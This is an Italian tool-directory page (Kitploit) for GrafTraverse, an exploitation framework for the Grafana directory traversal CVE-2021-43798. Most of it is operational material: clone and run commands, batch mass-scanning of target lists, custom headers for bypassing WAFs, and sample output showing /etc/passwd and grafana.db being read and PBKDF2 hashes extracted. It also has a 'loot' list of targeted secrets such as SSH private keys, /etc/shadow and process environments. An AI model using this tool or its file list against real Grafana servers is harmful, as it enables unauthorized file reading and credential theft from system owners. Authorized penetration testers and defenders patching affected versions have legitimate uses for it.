Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/asbawy/graftraverse-cve-2021-43798
Password CrackingAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingRed Teaming
GitHubasbawy/graftraverse-cve-2021-43798

GrafTraverse-CVE-2021-43798

CVE-2021-43798 MiNi Framework di Sfruttamento

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

GrafTraverse - CVE-2021-43798 Framework di Exploitation MiNi

Strumento di automazione da riga di comando per test di sicurezza autorizzati di Grafana Directory Traversal (CVE-2021-43798).


Panoramica

Banner

CVE-2021-43798 è una vulnerabilità di directory traversal non autenticata in Grafana 8.x che consente agli aggressori di leggere file arbitrari dal filesystem sottostante tramite l'endpoint /public/plugins/. La causa principale è una sanificazione impropria dei percorsi nelle richieste di asset dei plugin, che permette a sequenze ../ di uscire dalla directory prevista.

GrafTraverse è una riscrittura completa del proof-of-concept originale. Risolve bug critici nella gestione delle richieste, aggiunge scansione batch multi-thread, rilevamento automatico dei plugin, estrazione di credenziali e reportistica strutturata — rendendolo uno strumento di livello produttivo per red team e penetration tester.


Caratteristiche

CaratteristicaDescrizione
Brute-Force Multi-PluginSonda automaticamente oltre 40 plugin integrati per trovare un percorso vulnerabile
Modalità InterattivaSfruttamento di un singolo target guidato da menu con anteprima live dei file
Modalità BatchScansione multi-target concorrente con thread worker configurabili
Modalità WordlistEnumerazione approfondita di file utilizzando wordlist personalizzate
Estrazione Automatica HashEstrae automaticamente hash di password PBKDF2 dal grafana.db scaricato
Logging StrutturatoEsporta i risultati in JSON e CSV per una reportistica senza soluzione di continuità
Supporto ProxyInstrada il traffico attraverso Burp, ZAP o qualsiasi proxy HTTP (--proxy)
Intestazioni PersonalizzateInietta intestazioni arbitrarie per bypassare WAF o token di autenticazione (-H)
Personalizzazione TraversalSovrascrivi la profondità di traversal predefinita per ambienti non standard (--depth)
Filtraggio IntelligenteElimina i falsi positivi rifiutando le risposte JS/CSS/HTML dei plugin
Zero DipendenzeRichiede solo requests (pre-installato su Kali / Parrot)

Installazione

root@kitploit:~
# Clona il repository
git clone https://github.com/asbawy/GrafTraverse.git
cd GrafTraverse

# Assicurati che requests sia disponibile (è preinstallato su Kali)
pip3 install requests

# Rendi eseguibile
chmod +x GrafTraverse.py

Utilizzo

GrafTraverse utilizza una CLI basata su sottocomandi. Tutti i comandi supportano --help.

1. Singolo Target Interattivo

Avvia il menu interattivo contro un host:

root@kitploit:~
python3 GrafTraverse.py single -u http://IP:PORT
root@kitploit:~
============================================================
 INTERACTIVE MODE
============================================================
 1. /etc/passwd
 2. grafana.ini
 3. grafana.db
 4. Custom path
 5. Full automated loot
 6. Scan plugins
 7. Exit
============================================================

2. Scansione Plugin

Identifica rapidamente quale endpoint del plugin è vulnerabile senza sfruttamento:

root@kitploit:~
python3 GrafTraverse.py scan -u http://target:PORT

3. Scansione Batch

Carica i target da un file e processali contemporaneamente:

root@kitploit:~
python3 GrafTraverse.py batch -l targets.txt --workers 10 --csv results.csv

Formato di targets.txt:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000
https://grafana.target.com
# Le righe che iniziano con # vengono ignorate

4. Enumerazione Wordlist

Fornisci una lista di file personalizzata per traversal approfondito:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --wordlist sensitive_files.txt   --output-dir ./loot   --json log.json

5. Proxy e Intestazioni Personalizzate

Instrada attraverso Burp Suite e aggiungi intestazioni personalizzate:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --proxy http://127.0.0.1:8080   -H "X-Forwarded-For: 127.0.0.1"   -H "Authorization: Bearer eyJ0..."

Riferimento Comandi

single

FlagDescrizione
-u, --urlURL del target (obbligatorio)
--no-downloadModalità sola visualizzazione, non salvare i file
-t, --timeoutTimeout della richiesta in secondi (default: 10)
--proxyURL del proxy HTTP/HTTPS
-H, --headerIntestazione personalizzata (ripetibile)
--depthStringa di traversal (default: ../../../../../../../../)
--output-dirDirectory per salvare i file recuperati
--jsonAggiungi i risultati a un file di log JSON
--csvAggiungi i risultati a un file di log CSV
--wordlistFile contenente i percorsi da enumerare
--pluginForza un nome specifico di plugin

batch

FlagDescrizione
-l, --listFile con URL dei target (obbligatorio)
--workersThread concorrenti (default: 5)
(tutti i flag di single supportati)

scan

FlagDescrizione
-u, --urlURL del target (obbligatorio)
(tutti i flag di rete supportati)

Esempio di Output

Recupero File Riuscito

root@kitploit:~
[+] Output: 20260526_GrafTraverse
[*] Testing: /etc/passwd (via alertlist)
[+] SUCCESS: /etc/passwd (1874 bytes)

------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
------------------------------------------------------------

[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_passwd

Estrazione Hash DB Grafana

root@kitploit:~
[*] Testing: /var/lib/grafana/grafana.db (via alertlist)
[+] SUCCESS: /var/lib/grafana/grafana.db (98304 bytes)
[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_grafana.db
[*] Extracted 3 password hashes:
    admin:PBKDF2$sha256$10000$...base64...
    editor:PBKDF2$sha256$10000$...base64...
    viewer:PBKDF2$sha256$10000$...base64...

File Target (Bottino Automatico)

La sequenza di bottino integrata tenta di recuperare i seguenti file in ordine:

FileTipoSensibilità
/etc/passwdTestoEnumerazione utenti
/etc/shadowTestoHash password (raramente leggibili)
/etc/hostsTestoTopologia di rete
/etc/hostnameTestoIdentificazione host
/etc/grafana/grafana.iniTestoSegreti Grafana e credenziali DB
/var/lib/grafana/grafana.dbBinarioDatabase SQLite con hash utenti e chiavi API
/var/log/grafana/grafana.logTestoInformazioni operative
/root/.ssh/id_rsaTestoChiave privata SSH
/root/.ssh/authorized_keysTestoMappatura accesso basato su chiave
/proc/self/environTestoVariabili d'ambiente del processo
/proc/self/cmdlineTestoArgomenti del processo
/proc/versionTestoVersione del kernel
/proc/mountsTestoLayout del filesystem
/etc/os-releaseTestoIdentificazione SO
/etc/issueTestoIdentificazione SO
/etc/crontabTestoAttività pianificate
/etc/resolv.confTestoConfigurazione DNS

Versioni Affette

  • Grafana 8.0.0 fino a 8.3.0
  • Corretto in 8.3.1 e 7.5.12
Scarica lo strumento